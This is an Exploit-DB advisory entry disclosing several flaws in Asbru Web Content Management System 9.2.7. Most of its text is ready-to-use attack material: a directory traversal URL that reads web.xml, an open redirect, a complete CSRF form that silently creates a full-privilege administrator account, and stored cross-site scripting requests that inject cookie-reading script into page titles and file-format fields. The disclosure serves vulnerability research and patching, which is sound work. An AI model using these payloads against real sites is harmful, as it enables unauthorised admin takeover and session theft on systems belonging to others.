Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities

2016-04-06T00:00:00
ID EDB-ID:39667
Type exploitdb
Reporter LiquidWorm
Modified 2016-04-06T00:00:00

Description

Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities. Webapps exploit for jsp platform

                                        
                                            
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on : Apache Tomcat/5.5.23
            Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk


#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
  <body>
    <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
      <input type="hidden" name="userinfo" value="
<TEST></TEST>
" />
      <input type="hidden" name="title" value="Mr" />
      <input type="hidden" name="name" value="Chekmidash" />
      <input type="hidden" name="organisation" value="ZSL" />
      <input type="hidden" name="email" value="test@testingus.io" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="birthdate" value="1984-01-01" />
      <input type="hidden" name="birthday" value="01" />
      <input type="hidden" name="birthmonth" value="01" />
      <input type="hidden" name="birthyear" value="1984" />
      <input type="hidden" name="notes" value="CSRFNote" />
      <input type="hidden" name="userinfo1" value="" />
      <input type="hidden" name="userinfoname" value="" />
      <input type="hidden" name="username" value="hackedusername" />
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="userclass" value="administrator" />
      <input type="hidden" name="usergroup" value="" />
      <input type="hidden" name="usertype" value="" />
      <input type="hidden" name="usergroups" value="Account Managers" />
      <input type="hidden" name="usergroups" value="Company Bloggers" />
      <input type="hidden" name="usergroups" value="Customer" />
      <input type="hidden" name="usergroups" value="Event Managers" />
      <input type="hidden" name="usergroups" value="Financial Officers" />
      <input type="hidden" name="usergroups" value="Forum Moderator" />
      <input type="hidden" name="usergroups" value="Human Resources" />
      <input type="hidden" name="usergroups" value="Intranet Managers" />
      <input type="hidden" name="usergroups" value="Intranet Users" />
      <input type="hidden" name="usergroups" value="Newsletter" />
      <input type="hidden" name="usergroups" value="Press Officers" />
      <input type="hidden" name="usergroups" value="Product Managers" />
      <input type="hidden" name="usergroups" value="Registered Users" />
      <input type="hidden" name="usergroups" value="Shop Managers" />
      <input type="hidden" name="usergroups" value="Subscribers" />
      <input type="hidden" name="usergroups" value="Support Ticket Administrators" />
      <input type="hidden" name="usergroups" value="Support Ticket Users" />
      <input type="hidden" name="usergroups" value="User Managers" />
      <input type="hidden" name="usergroups" value="Website Administrators" />
      <input type="hidden" name="usergroups" value="Website Developers" />
      <input type="hidden" name="users_group" value="" />
      <input type="hidden" name="users_type" value="" />
      <input type="hidden" name="creators_group" value="" />
      <input type="hidden" name="creators_type" value="" />
      <input type="hidden" name="editors_group" value="" />
      <input type="hidden" name="editors_type" value="" />
      <input type="hidden" name="publishers_group" value="" />
      <input type="hidden" name="publishers_type" value="" />
      <input type="hidden" name="administrators_group" value="" />
      <input type="hidden" name="administrators_type" value="" />
      <input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
      <input type="hidden" name="scheduled_publish_email" value="" />
      <input type="hidden" name="scheduled_notify" value="" />
      <input type="hidden" name="scheduled_notify_email" value="" />
      <input type="hidden" name="scheduled_unpublish" value="" />
      <input type="hidden" name="scheduled_unpublish_email" value="" />
      <input type="hidden" name="invoice_name" value="Icebreaker" />
      <input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
      <input type="hidden" name="invoice_address" value="nu" />
      <input type="hidden" name="invoice_postalcode" value="1300" />
      <input type="hidden" name="invoice_city" value="Neverland" />
      <input type="hidden" name="invoice_state" value="ND" />
      <input type="hidden" name="invoice_country" value="ND" />
      <input type="hidden" name="invoice_phone" value="111-222-3333" />
      <input type="hidden" name="invoice_fax" value="" />
      <input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
      <input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
      <input type="hidden" name="delivery_name" value="" />
      <input type="hidden" name="delivery_organisation" value="" />
      <input type="hidden" name="delivery_address" value="" />
      <input type="hidden" name="delivery_postalcode" value="" />
      <input type="hidden" name="delivery_city" value="" />
      <input type="hidden" name="delivery_state" value="" />
      <input type="hidden" name="delivery_country" value="" />
      <input type="hidden" name="delivery_phone" value="" />
      <input type="hidden" name="delivery_fax" value="" />
      <input type="hidden" name="delivery_email" value="" />
      <input type="hidden" name="delivery_website" value="" />
      <input type="hidden" name="card_type" value="VISA" />
      <input type="hidden" name="card_number" value="4444333322221111" />
      <input type="hidden" name="card_issuedmonth" value="01" />
      <input type="hidden" name="card_issuedyear" value="2016" />
      <input type="hidden" name="card_expirymonth" value="01" />
      <input type="hidden" name="card_expiryyear" value="2100" />
      <input type="hidden" name="card_name" value="Hacker Hackerowsky" />
      <input type="hidden" name="card_cvc" value="133" />
      <input type="hidden" name="card_issue" value="" />
      <input type="hidden" name="card_postalcode" value="1300" />
      <input type="hidden" name="content_editor" value="" />
      <input type="hidden" name="hardcore_upload" value="" />
      <input type="hidden" name="hardcore_format" value="" />
      <input type="hidden" name="hardcore_width" value="" />
      <input type="hidden" name="hardcore_height" value="" />
      <input type="hidden" name="hardcore_onenter" value="" />
      <input type="hidden" name="hardcore_onctrlenter" value="" />
      <input type="hidden" name="hardcore_onshiftenter" value="" />
      <input type="hidden" name="hardcore_onaltenter" value="" />
      <input type="hidden" name="hardcore_toolbar1" value="" />
      <input type="hidden" name="hardcore_toolbar2" value="" />
      <input type="hidden" name="hardcore_toolbar3" value="" />
      <input type="hidden" name="hardcore_toolbar4" value="" />
      <input type="hidden" name="hardcore_toolbar5" value="" />
      <input type="hidden" name="hardcore_formatblock" value="" />
      <input type="hidden" name="hardcore_fontname" value="" />
      <input type="hidden" name="hardcore_fontsize" value="" />
      <input type="hidden" name="hardcore_customscript" value="" />
      <input type="hidden" name="startpage" value="" />
      <input type="hidden" name="workspace_sections" value="" />
      <input type="hidden" name="index_workspace" value="" />
      <input type="hidden" name="index_content" value="" />
      <input type="hidden" name="index_library" value="" />
      <input type="hidden" name="index_product" value="" />
      <input type="hidden" name="index_stock" value="" />
      <input type="hidden" name="index_order" value="" />
      <input type="hidden" name="index_segments" value="" />
      <input type="hidden" name="index_usertests" value="" />
      <input type="hidden" name="index_heatmaps" value="" />
      <input type="hidden" name="index_user" value="" />
      <input type="hidden" name="index_websites" value="" />
      <input type="hidden" name="menu_selection" value="" />
      <input type="hidden" name="statistics_reports" value="" />
      <input type="hidden" name="sales_reports" value="" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
</html>


#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>